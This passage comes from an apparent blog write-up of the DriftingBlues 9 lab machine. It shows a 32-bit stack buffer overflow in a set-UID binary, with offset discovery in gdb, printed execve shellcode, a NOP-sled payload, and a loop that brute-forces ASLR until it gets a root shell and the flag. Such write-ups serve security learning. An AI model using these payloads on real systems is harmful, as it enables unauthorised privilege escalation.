aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Segmentation fault<\/code><\/pre>\n<p>Segmentation fault: the buffer can be overflowed and the saved return address is under our control.<\/p>\n<h4>Checking ASLR<\/h4>\n<pre><code class=\"language-bash\">(remote) clapton@debian:\/home\/clapton$ cat \/proc\/sys\/kernel\/randomize_va_space\n2<\/code><\/pre>\n<p>2 means full randomization (stack, mmap and brk) is enabled on the target, so a stack address observed in one run cannot simply be hard-coded for the next.<\/p>\n<h4>Generating a cyclic pattern<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500$ locate pattern_create\n\/usr\/bin\/msf-pattern_create\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ \/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb -l 
500\nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq<\/code><\/pre>\n<h4>Test<\/h4>\n<p>Run the binary under gdb with the 500-byte pattern as argv[1]. The binary is 32-bit, so the faulting EIP shows which 4 consecutive pattern bytes overwrote the saved return address:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500# gdb .\/input\nGNU gdb (Debian 13.2-1) 13.2\nCopyright (C) 2023 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later &lt;http:\/\/gnu.org\/licenses\/gpl.html&gt;\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\nType &quot;show copying&quot; and &quot;show warranty&quot; for details.\nThis GDB was configured as &quot;x86_64-linux-gnu&quot;.\nType &quot;show configuration&quot; for configuration details.\nFor bug reporting instructions, please see:\n&lt;https:\/\/www.gnu.org\/software\/gdb\/bugs\/&gt;.\nFind the GDB manual and other documentation resources online at:\n    &lt;http:\/\/www.gnu.org\/software\/gdb\/documentation\/&gt;.\n\nFor help, type &quot;help&quot;.\nType &quot;apropos word&quot; to search for commands related to &quot;word&quot;...\nReading symbols from .\/input...\n(No debugging symbols found in .\/input)\n(gdb) run 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq\nStarting program: \/home\/kali\/temp\/driftingblues9\/input Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq\n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library &quot;\/lib\/x86_64-linux-gnu\/libthread_db.so.1&quot;.\n\nProgram received signal SIGSEGV, Segmentation fault.\n0x41376641 in ?? 
()<\/code><\/pre>\n<p>EIP holds 0x41376641. Read little-endian that is the byte sequence <code>Af7A<\/code>, so the saved return address was overwritten by the pattern bytes starting at that position; pattern_offset does the lookup:<\/p>\n<h4>Compute the offset<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500# locate pattern_offset\n\/usr\/bin\/msf-pattern_offset\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_offset.rb\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500# \/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_offset.rb -q 0x41376641\n[*] Exact match at offset 171<\/code><\/pre>\n<h4>Verify<\/h4>\n<p>171 bytes of filler, then 4 B bytes that should land exactly in EIP, then 80 bytes of padding:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500# python\nPython 3.11.8 (main, Feb  7 2024, 21:52:08) [GCC 13.2.0] on linux\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; print(171*&quot;A&quot;+&quot;B&quot;*4+80*&quot;D&quot;)\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/driftingblues9]\n\u2514\u2500# gdb .\/input\nGNU gdb (Debian 13.2-1) 13.2\nCopyright (C) 2023 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later &lt;http:\/\/gnu.org\/licenses\/gpl.html&gt;\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\nType &quot;show copying&quot; and &quot;show warranty&quot; for details.\nThis GDB was configured as &quot;x86_64-linux-gnu&quot;.\nType &quot;show configuration&quot; for configuration details.\nFor bug reporting instructions, please see:\n&lt;https:\/\/www.gnu.org\/software\/gdb\/bugs\/&gt;.\nFind the GDB manual and other documentation 
resources online at:\n    &lt;http:\/\/www.gnu.org\/software\/gdb\/documentation\/&gt;.\n\nFor help, type &quot;help&quot;.\nType &quot;apropos word&quot; to search for commands related to &quot;word&quot;...\nReading symbols from .\/input...\n(No debugging symbols found in .\/input)\n(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD\nStarting program: \/home\/kali\/temp\/driftingblues9\/input AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD\n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library &quot;\/lib\/x86_64-linux-gnu\/libthread_db.so.1&quot;.\n\nProgram received signal SIGSEGV, Segmentation fault.\n0x42424242 in ?? 
()<\/code><\/pre>\n<p>EIP is now exactly 0x42424242, the four B bytes, which confirms the 171-byte offset. Shellcode found online: <a href=\"https:\/\/www.exploit-db.com\/exploits\/13357\">https:\/\/www.exploit-db.com\/exploits\/13357<\/a> (it closes fd 0, reopens \/dev\/tty and then calls execve on \/bin\/\/sh):<\/p>\n<pre><code class=\"language-c\">char sc[] = \n&quot;\\x31\\xc0\\x31\\xdb\\xb0\\x06\\xcd\\x80&quot;\n&quot;\\x53\\x68\/tty\\x68\/dev\\x89\\xe3\\x31\\xc9\\x66\\xb9\\x12\\x27\\xb0\\x05\\xcd\\x80&quot;\n&quot;\\x31\\xc0\\x50\\x68\/\/sh\\x68\/bin\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\\x0b\\xcd\\x80&quot;;\n\/\/ 55 bytes<\/code><\/pre>\n<p>The shellcode is 55 bytes. One common layout places it inside the 171-byte buffer between two runs of padding, with EIP pointing back into the NOP bytes:<\/p>\n<blockquote>\n<p>Payload: [ NOP \/ 58] + [ shellcode \/ 55 ] + [ PAD \/ 58 ] + [ EIP ]<\/p>\n<\/blockquote>\n<p>58 + 55 + 58 = 171, so the EIP field lands exactly on the saved return address. The payload actually used further down takes the other common layout instead: NOP sled and shellcode placed after the return address. First disable ASLR on Kali; this only affects the local test box, the target still reports randomize_va_space = 2:<\/p>\n<pre><code class=\"language-bash\">sudo sysctl -w kernel.randomize_va_space=0<\/code><\/pre>\n<p>On the target, crash the binary under gdb with 64 NOP bytes placed after the 4-byte EIP overwrite, then look at where ESP points: the ret instruction pops the overwritten return address, so ESP ends up right behind it, inside those NOP bytes.<\/p>\n<pre><code class=\"language-bash\">(remote) clapton@debian:\/home\/clapton$ gdb -q input \nReading symbols from input...(no debugging symbols found)...done.\n(gdb) r $(python -c &#039;print(&quot;A&quot; * 171 + &quot;B&quot; * 4 + &quot;\\x90&quot; * 64 )&#039;)\nStarting program: \/home\/clapton\/input $(python -c &#039;print(&quot;A&quot; * 171 + &quot;B&quot; * 4 + &quot;\\x90&quot; * 64 )&#039;)\n\nProgram received signal SIGSEGV, Segmentation fault.\n0x42424242 in ?? 
()\n(gdb) x\/s $esp\n0xbf84e7a0:     &#039;\\220&#039; &lt;repeats 64 times&gt;<\/code><\/pre>\n<p>ESP is 0xbf84e7a0 and points at the NOP bytes (octal \\220 is 0x90). Build the payload: 171 bytes of filler, that address written little-endian (<code>\\xa0\\xe7\\x84\\xbf<\/code>), a 1000-byte NOP sled, and a 27-byte NUL-free execve shellcode for \/bin\/\/sh (a different, shorter one than the 55-byte exploit-db payload above). Execution returns into the sled and slides into the shellcode; the large sled tolerates the stack shifting somewhat between the gdb environment and a plain shell:<\/p>\n<pre><code class=\"language-bash\">r $(python -c &#039;print(&quot;A&quot; * 171 + &quot;\\xa0\\xe7\\x84\\xbf&quot; + &quot;\\x90&quot; * 1000 + &quot;\\x31\\xc9\\xf7\\xe1\\x51\\xbf\\xd0\\xd0\\x8c\\x97\\xbe\\xd0\\x9d\\x96\\x91\\xf7\\xd7\\xf7\\xd6\\x57\\x56\\x89\\xe3\\xb0\\x0b\\xcd\\x80&quot;)&#039;)<\/code><\/pre>\n<p>The target has ASLR set to 2, so the stack base changes on every run and the hard-coded address is usually wrong. On 32-bit the stack is only randomized over a limited range, so simply retrying until one run lands inside the sled works; each attempt runs in a subshell so a crash does not stop the loop:<\/p>\n<pre><code class=\"language-bash\">for i in {1..10000}; do (.\/input $(python -c &#039;print(&quot;A&quot; * 171 + &quot;\\xa0\\xe7\\x84\\xbf&quot; + &quot;\\x90&quot; * 1000 + &quot;\\x31\\xc9\\xf7\\xe1\\x51\\xbf\\xd0\\xd0\\x8c\\x97\\xbe\\xd0\\x9d\\x96\\x91\\xf7\\xd7\\xf7\\xd6\\x57\\x56\\x89\\xe3\\xb0\\x0b\\xcd\\x80&quot;)&#039;)) ; done<\/code><\/pre>\n<p>After a few crashes one attempt hits and we get the flag. The shell shows euid=0(root) while uid stays 1000(clapton): <code>input<\/code> is set-UID root, and the spawned \/bin\/sh (dash on Debian) keeps the elevated effective UID instead of resetting it the way bash would:<\/p>\n<pre><code class=\"language-bash\">Segmentation fault\nSegmentation fault\nSegmentation fault\nSegmentation fault\n# whoami;id\nroot\nuid=1000(clapton) gid=1000(clapton) euid=0(root) groups=1000(clapton)\n# cd \/root\n# ls -la\ntotal 16\ndrwx------  2 root root 4096 May  9  2021 .\ndrwxr-xr-x 21 root root 4096 May  9  2021 ..\n-rw-------  1 root root  649 May  9  2021 .bash_history\n-rw-r--r--  1 root root  295 May  9  2021 root.txt\n# cat root.txt\n\nthis is the final of driftingblues series. i hope you&#039;ve learned something from them.\n\nyou can always contact me at vault13_escape_service[at]outlook.com for your questions. (mail language: english\/turkish)\n\nyour root flag:\n\n04D4C1BEC659F1AA15B7AE731CEEDD65\n\ngood luck. 
( \u0361\u00b0 \u035c\u0296 \u0361\u00b0)<\/code><\/pre>\n<p>Sob, the pwn masters really are the GOATs; I have to properly learn pwn!!!<\/p>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/bbs.kanxue.com\/thread-259723.htm\">https:\/\/bbs.kanxue.com\/thread-259723.htm<\/a><\/p>\n<p><a href=\"https:\/\/devgiants.fr\/blog\/2021\/07\/15\/drifting-blues-9-writeup\/\">https:\/\/devgiants.fr\/blog\/2021\/07\/15\/drifting-blues-9-writeup\/<\/a><\/p>\n<p><a href=\"https:\/\/vishal-chandak.medium.com\/vulnhub-driftingblues-9-final-f39b59b3c38f\">https:\/\/vishal-chandak.medium.com\/vulnhub-driftingblues-9-final-f39b59b3c38f<\/a><\/p>\n<p><a href=\"https:\/\/zhuanlan.zhihu.com\/p\/570218595\">https:\/\/zhuanlan.zhihu.com\/p\/570218595<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>driftingblues9 The last box of this series, gogogo!!!! Information gathering Port scan rustsc 
